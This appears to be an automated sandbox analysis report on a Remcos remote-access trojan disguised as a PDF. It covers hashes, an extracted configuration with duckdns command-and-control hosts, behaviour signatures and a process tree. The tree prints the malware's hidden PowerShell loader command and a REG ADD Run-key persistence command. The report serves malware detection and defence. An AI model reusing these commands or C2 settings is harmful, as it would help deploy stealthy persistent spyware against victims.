Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-12-2024 09:14
Static task
static1
Behavioral task
behavioral1
Sample
DOCUMENT#5885588@081366(766.pdf.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DOCUMENT#5885588@081366(766.pdf.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Tredjelandes.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Tredjelandes.ps1
Resource
win10v2004-20241007-en
General
-
Target
DOCUMENT#5885588@081366(766.pdf.exe
-
Size
512KB
-
MD5
053184cbad166da8d6065e1fb934b964
-
SHA1
54fa68f4233ab168238ea71af23eec2436552a0b
-
SHA256
c877c021f20392b5c63533b4e59522f17d060d20341a47c76f24b7430c72ad54
-
SHA512
b6402e9b634cee834db92edfe02f39a77fecfef3ff2836605c2f1276424287e5559a34306a4d376ea999fe0850c27c45d3d16ce00a91d9a65f27ba04c3d6ea69
-
SSDEEP
12288:1BRxKL/cM4jJL3O80+E3DzGpiOZWWiawo9fv6MIfGYfmBBWMM:JwLkPjJLO6pilWva/fPmo
Malware Config
Extracted
remcos
WOW
eweo9264gtuiorta1.duckdns.org:2879
eweo9264gtuiorta1.duckdns.org:2889
surit2948estoat02.duckdns.org:2879
lafours8tursot2.duckdns.org:2879
lafours8tursot3.duckdns.org:2879
lafours8tursot4.duckdns.org:2879
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
hajoest.dat
-
keylog_flag
false
-
mouse_option
false
-
mutex
fsgthdjtru-5Y7T6I
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 400 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Overraekkelsen73 = "%Indstraaling164% -windowstyle 1 $Prioristic54=(gp -Path 'HKCU:\\Software\\storkors\\').Angili;%Indstraaling164% ($Prioristic54)" reg.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 21 2528 msiexec.exe 23 2528 msiexec.exe 25 2528 msiexec.exe 27 2528 msiexec.exe 31 2528 msiexec.exe 46 2528 msiexec.exe 50 2528 msiexec.exe 63 2528 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 drive.google.com 21 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2528 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 400 powershell.exe 2528 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\resources\figursyedes.lnk DOCUMENT#5885588@081366(766.pdf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOCUMENT#5885588@081366(766.pdf.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5108 reg.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 400 powershell.exe 400 powershell.exe 400 powershell.exe 400 powershell.exe 400 powershell.exe 400 powershell.exe 400 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 400 powershell.exe Token: SeIncreaseQuotaPrivilege 400 powershell.exe Token: SeSecurityPrivilege 400 powershell.exe Token: SeTakeOwnershipPrivilege 400 powershell.exe Token: SeLoadDriverPrivilege 400 powershell.exe Token: SeSystemProfilePrivilege 400 powershell.exe Token: SeSystemtimePrivilege 400 powershell.exe Token: SeProfSingleProcessPrivilege 400 powershell.exe Token: SeIncBasePriorityPrivilege 400 powershell.exe Token: SeCreatePagefilePrivilege 400 powershell.exe Token: SeBackupPrivilege 400 powershell.exe Token: SeRestorePrivilege 400 powershell.exe Token: SeShutdownPrivilege 400 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeSystemEnvironmentPrivilege 400 powershell.exe Token: SeRemoteShutdownPrivilege 400 powershell.exe Token: SeUndockPrivilege 400 powershell.exe Token: SeManageVolumePrivilege 400 powershell.exe Token: 33 400 powershell.exe Token: 34 400 powershell.exe Token: 35 400 powershell.exe Token: 36 400 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 3092 wrote to memory of 400 3092 DOCUMENT#5885588@081366(766.pdf.exe 82 PID 3092 wrote to memory of 400 3092 DOCUMENT#5885588@081366(766.pdf.exe 82 PID 3092 wrote to memory of 400 3092 DOCUMENT#5885588@081366(766.pdf.exe 82 PID 400 wrote to memory of 2528 400 powershell.exe 91 PID 400 wrote to memory of 2528 400 powershell.exe 91 PID 400 wrote to memory of 2528 400 powershell.exe 91 PID 400 wrote to memory of 2528 400 powershell.exe 91 PID 2528 wrote to memory of 1520 2528 msiexec.exe 92 PID 2528 wrote to memory of 1520 2528 msiexec.exe 92 PID 2528 wrote to memory of 1520 2528 msiexec.exe 92 PID 1520 wrote to memory of 5108 1520 cmd.exe 94 PID 1520 wrote to memory of 5108 1520 cmd.exe 94 PID 1520 wrote to memory of 5108 1520 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\DOCUMENT#5885588@081366(766.pdf.exe"C:\Users\Admin\AppData\Local\Temp\DOCUMENT#5885588@081366(766.pdf.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Effeminacies=Get-Content -raw 'C:\Users\Admin\AppData\Local\parkeringsforholdet\Irrational\Tredjelandes.Sel';$Gizeh4=$Effeminacies.SubString(2147,3);.$Gizeh4($Effeminacies)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Overraekkelsen73" /t REG_EXPAND_SZ /d "%Indstraaling164% -windowstyle 1 $Prioristic54=(gp -Path 'HKCU:\Software\storkors\').Angili;%Indstraaling164% ($Prioristic54)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Overraekkelsen73" /t REG_EXPAND_SZ /d "%Indstraaling164% -windowstyle 1 $Prioristic54=(gp -Path 'HKCU:\Software\storkors\').Angili;%Indstraaling164% ($Prioristic54)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5108
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
287KB
MD5f20bfd077f96d3b5f57cce52c6fa8ebe
SHA1b2bc4ec3384f6402687deb55c73c8bb904f8b7c4
SHA256c96b45939261aae0e7b2f439ff96ea7f8a188ceb9f8528cb3d274419cc7dfc91
SHA512a836d407668a815f890494d89d9a4d5bfc01896799a185471fb2939028955c61e03c932acc06af3418540ccd2521f160769d29ec5aea96c1b61e5164d9f47c59
-
Filesize
52KB
MD585edb7354ba656bbb556d21c8e68831c
SHA1e01c029026be5e5d7e17cdd191360d9bbd9d9e27
SHA256d9b3298dafafc8f85e167c0c739d94cf6671f017e1a0cf7e759ff6158b5921ed
SHA512b86b8ee9f4f0f0421074de62c439ef5cf63b441f44b95c9a1ca28b357c9fd52c85ba00af70e975f4e5aa4601829026ee2ebec143fb9357815e76635fdf3a28d5